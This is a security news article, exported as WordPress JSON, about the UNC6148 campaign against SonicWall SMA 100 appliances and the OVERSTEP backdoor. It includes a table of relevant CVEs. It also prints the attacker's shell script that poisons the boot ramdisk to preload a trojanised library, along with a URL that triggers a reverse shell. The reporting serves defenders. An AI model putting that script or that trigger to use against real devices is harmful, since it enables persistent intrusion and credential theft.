{"id":5413,"date":"2025-07-17T10:05:28","date_gmt":"2025-07-17T10:05:28","guid":{"rendered":"https:\/\/serisec.com\/index.php\/2025\/07\/17\/sonicwall-sma-devices-0-day-rce-vulnerability-exploited-to-deploy-overstep-ransomware\/"},"modified":"2025-07-17T10:05:28","modified_gmt":"2025-07-17T10:05:28","slug":"sonicwall-sma-devices-0-day-rce-vulnerability-exploited-to-deploy-overstep-ransomware","status":"publish","type":"post","link":"https:\/\/serisec.com\/index.php\/2025\/07\/17\/sonicwall-sma-devices-0-day-rce-vulnerability-exploited-to-deploy-overstep-ransomware\/","title":{"rendered":"SonicWall SMA Devices 0-Day RCE Vulnerability Exploited to Deploy OVERSTEP Ransomware"},"content":{"rendered":"

SonicWall SMA Devices 0-Day RCE Vulnerability Exploited to Deploy OVERSTEP Ransomware
\n \t

\n
<\/BR>
\n
\n \t

\n
<\/BR><\/p>\n

\n

SonicWall\u2019s end-of-life SMA 100 series appliances are again on the front line after investigators unearthed a covert campaign that couples a suspected zero-day remote-code-execution flaw with a sophisticated backdoor called OVERSTEP.<\/p>\n

The operation, attributed to the financially motivated group UNC6148, first steals administrator credentials and one-time-password seeds, then pivots to full device compromise before exfiltrating data and preparing for ransomware deployment.<\/p>\n

The attack chain begins with a burst of HTTP requests that ultimately hands the adversary a shell on the appliance\u2014an action that should be impossible under normal conditions.<\/p>\n

Google Threat Intelligence analysts noted<\/a> that once the shell is active the intruder exports the device\u2019s configuration, quietly injects malicious rules, and uploads a base64-encoded binary into the persistent \/cf<\/code> partition.<\/p>\n

The binary is later copied to \/usr\/lib\/libsamba-errors.so.6<\/code> and force-loaded on every process start via \/etc\/ld.so.preload<\/code>, instantly granting the actor root-level reach across the appliance.<\/p>\n

Investigators tied the initial foothold to one of several long-standing SMA vulnerabilities<\/a> routinely traded in crime forums.<\/p>\n

Table 1 summarises the most relevant bugs that provide either direct code-execution or credential theft paths exploited by related campaigns over the past three years.<\/p>\n

\n\n\n\n\n\n\n\n\n\n
CVE<\/th>\nYear<\/th>\nAuth?<\/th>\nType<\/th>\nKey Impact<\/th>\nPatch Status<\/th>\n<\/tr>\n<\/thead>\n
CVE-2021-20038<\/td>\n2021<\/td>\nNo<\/td>\nMemory corruption RCE<\/td>\nExecute arbitrary code unauthenticated<\/td>\nPatched July 2021<\/td>\n<\/tr>\n
CVE-2024-38475<\/td>\n2024<\/td>\nNo<\/td>\nPath traversal<\/td>\nDump temp.db<\/code> & persist.db<\/code> to steal passwords and OTP seeds<\/td>\nPatched Feb 2025<\/td>\n<\/tr>\n
CVE-2021-20035<\/td>\n2021<\/td>\nYes<\/td>\nCommand injection<\/td>\nRCE via \/cgi-bin\/sitecustomization<\/code> handler<\/td>\nPatched April 2021<\/td>\n<\/tr>\n
CVE-2021-20039<\/td>\n2021<\/td>\nYes<\/td>\nCommand injection<\/td>\nRCE via \/cgi-bin\/viewcert<\/code> handler linked to Abyss ransomware<\/td>\nPatched May 2021<\/td>\n<\/tr>\n
CVE-2025-32819<\/td>\n2025<\/td>\nYes<\/td>\nFile deletion<\/td>\nResets built-in admin password to password<\/code>\n<\/td>\nPatched June 2025<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/figure>\n

The Shell commands executed by the dopasswords<\/code> command depicts how OVERSTEP compresses credential databases into a web-reachable TAR archive, ensuring effortless download by the attacker.<\/p>\n

Persistence Tactics: Hijacking the Boot Sequence<\/strong><\/h2>\n

Once foothold is secured, UNC6148 cements persistence<\/a> by rewriting the bootCurrentFirmware()<\/code> routine inside \/etc\/rc.d\/rc.fwboot<\/code>.<\/p>\n

The modified script mounts the device\u2019s compressed initial RAM disk (INITRD<\/code>), plants the trojanised library, and rewrites INITRD.GZ<\/code> so the rogue code loads before any legitimate service.<\/p>\n

A timestamp \u201ctouch\u201d operation aligns file dates with the official kernel image, frustrating any quick metadata checks.<\/p>\n

# Extract and poison INITRD\ngzip -d $fwLoc\/INITRD.GZ\nmount -o loop $fwLoc\/INITRD $fwLoc\/zzz\ncp \/cf\/libsamba-errors.so.6 $fwLoc\/zzz\/usr\/lib\/\necho \/usr\/lib\/libsamba-errors.so.6 > $fwLoc\/zzz\/etc\/ld.so.preload\numount $fwLoc\/zzz && gzip $fwLoc\/INITRD\nmv $fwLoc\/INITRD.gz $fwLoc\/INITRD.GZ\n\/usr\/local\/sbin\/kexec -l $fwLoc\/BZIMAGE --append=\"`cat $fwLoc\/LINUX.OPT`\"\n\/usr\/local\/sbin\/kexec -e<\/code><\/pre>\n
When the appliance reboots, every dynamic binary\u2014including the web server responsible for logging\u2014links against the malicious library.<\/p>\n
OVERSTEP hooks open*<\/code>, readdir*<\/code>, and write<\/code> to hide its presence and parse inbound buffers for the strings dobackshell<\/code> or dopasswords<\/code>.<\/p>\n
A single HTTP GET such as https:\/\/device\/query?q=dobackshell,1.2.3.4,4444<\/code> triggers a reverse shell without touching disk logs, thanks to in-memory log tampering executed inside the hijacked write<\/code> call.<\/p>\n
The result is a resilient foothold: even fully patched appliances can be re-compromised as long as stolen credentials<\/a> remain valid.<\/p>\n
Google\u2019s analysts urge defenders to image disks offline, rotate every password and OTP seed, and verify the absence of \/etc\/ld.so.preload<\/code>; its very existence on SMA hardware is \u201ctantamount to compromise\u201d.<\/p>\n
Boost detection, reduce alert fatigue, accelerate response; all with an interactive sandbox built for security teams ->\u00a0Try ANY.RUN Now<\/a><\/strong><\/p>\n
The post SonicWall SMA Devices 0-Day RCE Vulnerability Exploited to Deploy OVERSTEP Ransomware<\/a> appeared first on Cyber Security News<\/a>.<\/p>\n<\/div>\n
 \t

\n 
<\/BR>
\n    Tushar Subhra Dutta
\n \t

\n
<\/BR>
\nGo to cyber-security-news<\/a>
\n \t

\n 
<\/BR><\/p>\n","protected":false},"excerpt":{"rendered":"
SonicWall SMA Devices 0-Day RCE Vulnerability Exploited to Deploy OVERSTEP Ransomware SonicWall\u2019s end-of-life SMA 100 series appliances are again on the front line after investigators unearthed a covert campaign that couples a suspected zero-day remote-code-execution flaw with a sophisticated backdoor called OVERSTEP. The operation, attributed to the financially motivated group UNC6148, first steals administrator credentials […]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[63,131],"tags":[130],"class_list":["post-5413","post","type-post","status-publish","format-standard","hentry","category-cyber-security-news","category-vulnerability","tag-cyber-security-news"],"_links":{"self":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts\/5413"}],"collection":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/comments?post=5413"}],"version-history":[{"count":0,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts\/5413\/revisions"}],"wp:attachment":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/media?parent=5413"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/categories?post=5413"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/tags?post=5413"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}